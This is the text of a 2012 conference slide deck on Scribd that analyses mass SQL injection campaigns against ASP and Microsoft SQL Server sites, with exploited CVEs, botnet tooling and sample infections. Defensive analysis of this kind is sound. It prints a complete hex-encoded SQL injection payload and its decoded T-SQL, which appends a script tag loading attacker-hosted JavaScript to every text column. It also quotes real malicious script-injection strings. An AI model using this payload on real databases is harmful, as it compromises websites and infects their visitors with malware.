Scribd Logo
Cargar

¡Te damos la bienvenida a Scribd!

  • Analysis of Mass SQLi Attacks

    Cargado por

    Miroslav Stampar
    50 vistas40 páginas
    "A new virus is making the rounds and is wreaking havoc on the internet" ".blazing through the internet, infecting more than half a million domains around the world to date"

    Descripción original:

    Derechos de autor

    © Attribution Non-Commercial (BY-NC)

    Formatos disponibles

    PDF, TXT o lea en línea desde Scribd

    ¿Le pareció útil este documento?

    ¿Este contenido es inapropiado?

    Denunciar este documento
    "A new virus is making the rounds and is wreaking havoc on the internet" ".blazing through the internet, infecting more than half a million domains around the world to date"

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Descargue como PDF, TXT o lea en línea desde Scribd
    Marcar por contenido inapropiado
    50 vistas40 páginas

    Analysis of Mass SQLi Attacks

    Cargado por

    Miroslav Stampar
    "A new virus is making the rounds and is wreaking havoc on the internet" ".blazing through the internet, infecting more than half a million domains around the world to date"

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Descargue como PDF, TXT o lea en línea desde Scribd
    Marcar por contenido inapropiado
    de 40

    Analysis of mass SQL injection attacks

    Miroslav tampar
    (dev@sqlmap.org)

    FUD (Fear, Uncertainty, Doubt)


    A new virus is making the rounds and is wreaking havoc on the Internet Whatever language is used to write to the database, all SQL databases use the same basic formulas for writing and retrieving data Targets that bottleneck in the technology, making it platform-independent Whether the machine is using ASP, ColdFusion, JSP, PHP, or whatever else ...blazing through the internet, infecting more than half a million domains around the world to date and as many as 1.5 million URLs
    FSec FOI 2012, Varadin (Croatia) September 21st, 2012 2

    Google is (not) your friend (1)

    FSec FOI 2012, Varadin (Croatia)

    September 21st, 2012

    Google is (not) your friend (2)

    FSec FOI 2012, Varadin (Croatia)

    September 21st, 2012

    Google is (not) your friend (3)

    FSec FOI 2012, Varadin (Croatia)

    September 21st, 2012

    What's it all about?


    Platform dependent (IIS/ASP(.NET)) DBMS dependent (Microsoft SQL Server) Highly automated (tool-based) approach Popular SQL enumeration tools with or without Google search capability don't count (e.g. sqlmap, Havij, Pangolin) Infection(s) counting in thousands of domains (not millions as previously believed) Dummy as it can be (usually one request per target) In short: malware distribution
    FSec FOI 2012, Varadin (Croatia) September 21st, 2012 6

    Modus operandi
    Get hands on couple of 1-day exploits Blindly inject SQL payload carrying malicious content (<script>, <iframe>, etc.) into content tables of as much as possible vulnerable web servers Leverage exploit(s) and/or user's lack of technical knowledge to install malware (spyware, trojans, etc.) to visitor's computer Profit(???) - (DEFCON 18 Garry Pejski: My Life As A Spyware Developer)
    FSec FOI 2012, Varadin (Croatia) September 21st, 2012 7

    Sample leveraged exploits


    CVE-2012-4681 CVE-2012-1889 CVE-2012-1723 CVE-2012-0507 CVE-2011-3544 CVE-2011-2110 CVE-2011-0611 CVE-2010-3552 CVE-2010-0188 etc. Oracle Java 7 Update 6 Microsoft XML Core Services Java Runtime Environment Java Runtime Environment Java Runtime Environment Adobe Flash Player Adobe Flash Player New Java Plug-in Adobe Reader

    FSec FOI 2012, Varadin (Croatia)

    September 21st, 2012

    Notable members (1)


    Lilupophilupop (sl.php)
    "></title><script src="http://lilupophilupop.com/sl.php"></script><!--

    Nikjju (r.php)
    <script src=http://nikjju.com/r.php></script>

    Robint (u.js)
    <script src=http://ww.robint.us/u.js></script>

    LizaMoon (ur.php)
    </title><script src=http://lizamoon.com/ur.php></script>

    Jjghui (urchin.js)
    </title><script src=http://jjghui.com/urchin.js></script>

    FSec FOI 2012, Varadin (Croatia)

    September 21st, 2012

    Notable members (2)

    FSec FOI 2012, Varadin (Croatia)

    September 21st, 2012

    10

    Notable members (3)

    FSec FOI 2012, Varadin (Croatia)

    September 21st, 2012

    11

    Generic payload (obfuscated)


    GET /vuln.asp?param=1;DECLARE @S VARCHAR(4000);SET @S=CAST(0x4445434C415245204054205641524348415228323535292C40 4320564152434841522832353529204445434C415245205461626C655F43 7572736F7220435552534F5220464F522053454C45435420612E6E616D65 2C622E6E616D652046524F4D207379736F626A6563747320612C73797363 6F6C756D6E73206220574845524520612E69643D622E696420414E442061 2E78747970653D27752720414E442028622E78747970653D3939204F5220 ............................................................ 5845432827555044415445205B272B40542B275D20534554205B272B4043 2B275D3D525452494D28434F4E5645525428564152434841522834303030 292C5B272B40432B275D29292B27273C736372697074207372633D687474 703A2F2F7777772E63686B6164772E636F6D2F622E6A733E3C2F73637269 70743E27272729204645544348204E4558542046524F4D205461626C655F 437572736F7220494E544F2040542C404320454E4420434C4F5345205461 626C655F437572736F72204445414C4C4F43415445205461626C655F4375 72736F7220 AS VARCHAR(4000));EXEC(@S);--

    FSec FOI 2012, Varadin (Croatia)

    September 21st, 2012

    12

    Generic payload (decoded)


    DECLARE @t VARCHAR(255), @c VARCHAR(255) DECLARE table_cursor CURSOR FOR SELECT a.name, b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) /* NTEXT, TEXT, NVARCHAR, VARCHAR */ OPEN table_cursor FETCH NEXT FROM WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@t+'] SET ['+@c+']=RTRIM(CONVERT(VARCHAR, ['+@c+']))+''<script src=http://www.attacker.com/malicious.js></script>''') FETCH NEXT FROM END CLOSE table_cursor DEALLOCATE table_cursor
    FSec FOI 2012, Varadin (Croatia) September 21st, 2012 13

    table_cursor INTO @t,@c

    table_cursor INTO @t,@c

    Analysis (1)
    Piggy backing (stacked) SQL injection Obfuscated SQL code (hex encoded) Decoded code dynamically executed with TSQL EXEC command Usage of cursor for update Iterating over all tables / all text-like columns Appending malicious content (e.g. <script src=...) to all matched column entries using UPDATE statement

    FSec FOI 2012, Varadin (Croatia)

    September 21st, 2012

    14

    Analysis (2)

    FSec FOI 2012, Varadin (Croatia)

    September 21st, 2012

    15

    Analysis (3)

    FSec FOI 2012, Varadin (Croatia)

    September 21st, 2012

    16

    Example (1) - FAIL

    FSec FOI 2012, Varadin (Croatia)

    September 21st, 2012

    17

    Example (2) - FAIL

    FSec FOI 2012, Varadin (Croatia)

    September 21st, 2012

    18

    Example (3) - FAIL

    FSec FOI 2012, Varadin (Croatia)

    September 21st, 2012

    19

    Example (4) CLUSTER FAIL

    FSec FOI 2012, Varadin (Croatia)

    September 21st, 2012

    20

    Example (5) - SUCCESS

    FSec FOI 2012, Varadin (Croatia)

    September 21st, 2012

    21

    Example (6) - SUCCESS

    FSec FOI 2012, Varadin (Croatia)

    September 21st, 2012

    22

    Asprox (1)
    Spam botnet used for phishing scams (>10K bots) Developed over years Interesting update msscntr32.exe (SQL attack tool) Google search for targets (e.g. inurl:".asp") Launch SQL injection attacks against resulting pages

    FSec FOI 2012, Varadin (Croatia)

    September 21st, 2012

    23

    Asprox (2)

    FSec FOI 2012, Varadin (Croatia)

    September 21st, 2012

    24

    CLI (1)
    Standalone executable Rare beast (Chinese underground forums?) Google search for targets (e.g.: inurl:".asp" inurl:"a=") Configurable malicious tag that will be inserted (originally <script src=http://www.2117966.net/fuckjp.js></s cript>) Wild guess is that attackers are being paid for using the tool (backcall to *.cn/pay.asp? SN=...)
    FSec FOI 2012, Varadin (Croatia) September 21st, 2012 25

    CLI (2)

    FSec FOI 2012, Varadin (Croatia)

    September 21st, 2012

    26

    Sample tool (1)

    FSec FOI 2012, Varadin (Croatia)

    September 21st, 2012

    27

    Sample tool (2)

    FSec FOI 2012, Varadin (Croatia)

    September 21st, 2012

    28

    Sample tool (3)

    FSec FOI 2012, Varadin (Croatia)

    September 21st, 2012

    29

    Sample tool (4)

    FSec FOI 2012, Varadin (Croatia)

    September 21st, 2012

    30

    Sample tool (5)

    FSec FOI 2012, Varadin (Croatia)

    September 21st, 2012

    31

    Sample run (1)

    FSec FOI 2012, Varadin (Croatia)

    September 21st, 2012

    32

    Sample run (2)

    FSec FOI 2012, Varadin (Croatia)

    September 21st, 2012

    33

    Sample run (3)

    FSec FOI 2012, Varadin (Croatia)

    September 21st, 2012

    34

    Sample run (5)

    FSec FOI 2012, Varadin (Croatia)

    September 21st, 2012

    35

    Sample run (6)

    FSec FOI 2012, Varadin (Croatia)

    September 21st, 2012

    36

    Sample run (7)

    FSec FOI 2012, Varadin (Croatia)

    September 21st, 2012

    37

    Sample run (8)

    FSec FOI 2012, Varadin (Croatia)

    September 21st, 2012

    38

    Sample run (9)

    FSec FOI 2012, Varadin (Croatia)

    September 21st, 2012

    39

    Questions?

    FSec FOI 2012, Varadin (Croatia)

    September 21st, 2012

    40

    También podría gustarte